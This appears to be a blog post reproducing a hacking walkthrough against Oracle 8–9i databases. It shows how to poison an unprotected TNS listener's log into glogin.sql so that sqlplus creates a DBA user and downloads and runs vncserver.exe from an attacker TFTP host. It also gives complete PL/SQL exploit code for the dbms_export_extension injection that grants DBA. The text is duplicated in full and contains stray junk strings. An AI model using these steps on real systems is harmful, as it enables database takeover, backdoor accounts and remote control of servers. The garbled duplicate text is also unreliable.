Hacking the TNS Listener (Oracle 8-9i Rel.2)
The first stepin hacking the TNS Listener is to start the TFTPD in the backtrack-menu. This
step is optional could could be used to upload executables to the database server
ssaas
The TFTP-Server is normally running on port 69 with Home Directory /tmp.
Now we are copying an executable for the target platform (e.g. vncserver.exe, netcat ) into the
directory /tmp.
Now we must get the path of the ORACLE_HOME via the (unprotected) TNS Listener
The result
The result of the previous command is the ORACLE_HOME (here: c:\oracle\ora92)
The next step is to change the name and directory of the logfile, e.g.
c:\oracle\ora92\sqlplus\admin\glogin.sql.
Instead of modifying the glogin.sql it is also possible to put content into the .rhosts (a
security aware DBA should NEVER run R*-Services on a Unix-Server) or we could upload
authorized keys for SSH. This is not shown here.
Now we are writing OS commands (download and execute binary from TFTP server) and
SQL commands to the listener log file:
tnscmd10g.pl –h 192.168.2.238 –rawcmd “(CONNECT_DATA=((
set term off
create user backtrack20 identified by backtrack20;
grant dba to backtrack20;
host tftp –I 192.168.2.30 GET vncserver.exe vncserver.exe
host vncserver
set term on
Now we are changing the value of the listener.log back to the original value
The next time the DBA is using sqlplus on the database server, the code in the glogin.sql is
executed, vnserver.exe (or netcat) is downloaded and executed.
Now
Now we use vnc to connect to the client. Or we can connect with out newly created user
backtrack20 to connect to the database.
Nov.
GAME OVER –
Server 0wned.
Privilege Escalation
There are various ways to do a privilege escalation.
dbms_export_extension (Oracle 8i – 10.2.0.2)
One of the possibilities to become DBA is a SQL Injection vulnerability in
dbms_export_extension. The following exploit was posted as an 0day on the Bugtraq security
mailing list and is known since April 2006. The Oracle CPU July 2006 (or newer patchsets
like 9.2.0.8) is fixing this problem.
In the beginning we must connect to the database with a user with create procedure privileges.
As we can see we do not have DBA privileges (“desc dba_users”).
sqlplus scott/tiger@//192.168.2.238/ora9207
-- Create a function in a package first and inject this function. The function will be executed
as user SYS.
CREATE OR REPLACE
PACKAGE BT20_EXPLOIT AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/
CREATE OR REPLACE PACKAGE BODY BT20_EXPLOIT
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN(1);
END;
END;
/
jhj
-- Inject the function in dbms_export_extension
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1';
INDEX_SCHEMA := 'SCOTT';
TYPE_NAME := 'BT20_EXPLOIT';
TYPE_SCHEMA := 'SCOTT';
VERSION := '10.2.0.2.0';
GMFLAGS := 1;
v_Return :=
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA,
TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/
Now we must logout and login again. After that we are DBA (if the system was not patched
or updated to the latest version).
The first stepin hacking the TNS Listener is to start the TFTPD in the backtrack-menu. This
step is optional could could be used to upload executables to the database server
ssaasThe TFTP-Server is normally running on port 69 with Home Directory /tmp.
Now we are copying an executable for the target platform (e.g. vncserver.exe, netcat ) into the
directory /tmp.
Now we must get the path of the ORACLE_HOME via the (unprotected) TNS Listener
The result
The result of the previous command is the ORACLE_HOME (here: c:\oracle\ora92)
The next step is to change the name and directory of the logfile, e.g.
c:\oracle\ora92\sqlplus\admin\glogin.sql.
Instead of modifying the glogin.sql it is also possible to put content into the .rhosts (a
security aware DBA should NEVER run R*-Services on a Unix-Server) or we could upload
authorized keys for SSH. This is not shown here.
Now we are writing OS commands (download and execute binary from TFTP server) and
SQL commands to the listener log file:
tnscmd10g.pl –h 192.168.2.238 –rawcmd “(CONNECT_DATA=((
set term off
create user backtrack20 identified by backtrack20;
grant dba to backtrack20;
host tftp –I 192.168.2.30 GET vncserver.exe vncserver.exe
host vncserver
set term on
Now we are changing the value of the listener.log back to the original valueThe next time the DBA is using sqlplus on the database server, the code in the glogin.sql is
executed, vnserver.exe (or netcat) is downloaded and executed.
Now
Now we use vnc to connect to the client. Or we can connect with out newly created user
backtrack20 to connect to the database.
Nov.
GAME OVER –
Server 0wned.
Privilege Escalation
There are various ways to do a privilege escalation.
dbms_export_extension (Oracle 8i – 10.2.0.2)
One of the possibilities to become DBA is a SQL Injection vulnerability in
dbms_export_extension. The following exploit was posted as an 0day on the Bugtraq security
mailing list and is known since April 2006. The Oracle CPU July 2006 (or newer patchsets
like 9.2.0.8) is fixing this problem.
In the beginning we must connect to the database with a user with create procedure privileges.
As we can see we do not have DBA privileges (“desc dba_users”).
sqlplus scott/tiger@//192.168.2.238/ora9207
-- Create a function in a package first and inject this function. The function will be executed
as user SYS.
CREATE OR REPLACE
PACKAGE BT20_EXPLOIT AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/
CREATE OR REPLACE PACKAGE BODY BT20_EXPLOIT
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN(1);
END;
END;
/
jhj
-- Inject the function in dbms_export_extension
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1';
INDEX_SCHEMA := 'SCOTT';
TYPE_NAME := 'BT20_EXPLOIT';
TYPE_SCHEMA := 'SCOTT';
VERSION := '10.2.0.2.0';
GMFLAGS := 1;
v_Return :=
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA,
TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/
Now we must logout and login again. After that we are DBA (if the system was not patched
or updated to the latest version).
0 comments:
Post a Comment